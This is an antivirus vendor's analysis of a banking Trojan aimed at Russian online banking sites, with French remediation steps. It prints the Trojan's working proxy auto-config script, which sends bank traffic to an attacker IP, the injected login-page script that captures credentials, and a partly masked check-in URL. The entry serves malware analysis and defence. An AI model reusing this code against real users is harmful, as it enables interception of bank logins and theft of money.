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Trojan.Proxy2.102

Added to the Dr.Web virus database: 2016-02-08

Virus description added:

SHA1:

  • 8bd982ce95775eb3fe63cb4b6e966ff5c17d462b

A banking Trojan designed to steal money from users’ bank accounts. The Trojan installs a root certificate on a machine to sign webpages of the following online banking systems:

  • https://online.sberbank.ru
  • https://online.vtb24.ru
  • https://online.rsb.ru

screen Trojan.Proxy2.102 #drweb

It also changes the Internet connection settings by specifying a proxy server address:

screen Trojan.Proxy2.102 #drweb

The malicious application uses an automatic configuration script to modify the settings:

AutoConfigURL http://mssinfosys.com/2y4sP9/wYuy.rui
function FindProxyForURL(url, host) {
    var P = "PROXY 185.93.185.204:8087";
    if (shExpMatch(host, "?n?ine.sbe?b?nk.r*") || shExpMatch(host, "?n?ine.v?b24.r*") || shExpMatch(host, "?n?ine.r?b.r*")) {
        return P;
    }
    return "DIRECT";
}

The Trojan then injects arbitrary content into a webpage of an online banking system once it is opened by a user. An example of web injection that the malware program performs for online.sberbank.ru looks as follows:

<textarea id="rsaPublic" style="display: none">-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCZsfqlRbujEYlGcL33RyR0oWap
i0t5Ia5KQqZo8kz/ULAg537eM77izEhG+fSndYMN4hizmS/inhJI+krpuCjFItrA
Tq+y7JUS9NKahXluTq3gT/5pIDSpuweD6bzxPFGKqwmCaonW/6NRMMtE59751yX0
MuleI5mVr5ZiL0uKlQIDAQAB
-----END PUBLIC KEY-----</textarea>
 
        <script type="text/javascript">
            function submitData()
            {
                
                 
                 
                $("#loginHash").val(hex_md5( $("#login").val() + $("#password").val() ));
                $("#passwordHash").val(hex_md5( $("#password").val() ));
                 
                var crypt = new JSEncrypt();
                  
                crypt.setKey($("#rsaPublic").val());
                 
                $("#loginCrypt").val( crypt.encrypt($("#login").val()) );
                $("#passwordCrypt").val( crypt.encrypt($("#password").val()) );
                 
               // $("#login").val(" ");
                $("#password").val("pass");
                
                setRSAData();
                authForm.hidePassword();
                authForm.submit($('#buttonSubmit')[0], 'button.begin');
            }
             
            var dom_data_collection = new DomDataCollection();
            function setElementValue(name, value)
            {
                var frm = $("#loginForm")[0];
                var field = getElementFromCollection(frm.elements, name);
                if (field == null)
                {
                    addField('hidden', name, value);
                }
                else
                {
                    field.value = value;
                }
            }
            function setRSAData ()
            {
               setElementValue('deviceprint', add_deviceprint());
               setElementValue('htmlinjection', dom_data_collection.domDataAsJSON());
               setElementValue('manvsmachinedetection', UIEventCollector.serialize());
            }
            doOnLoad(function () {
               dom_data_collection.startInspection();
               UIEventCollector.initEventCollection();
            });
        </script>

If the installation is successful, the Trojan sends the following message to the server:

http://infom****.com/nsb2/SoftCheck.php?id=76487-640-1803887-23181&ver=0000005&name=upd

The server then replies with

good!

The Trojan does not register itself in autorun. Thus, once all the malicious functions are performed, it goes to an infinite sleep mode.

News about the Trojan

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android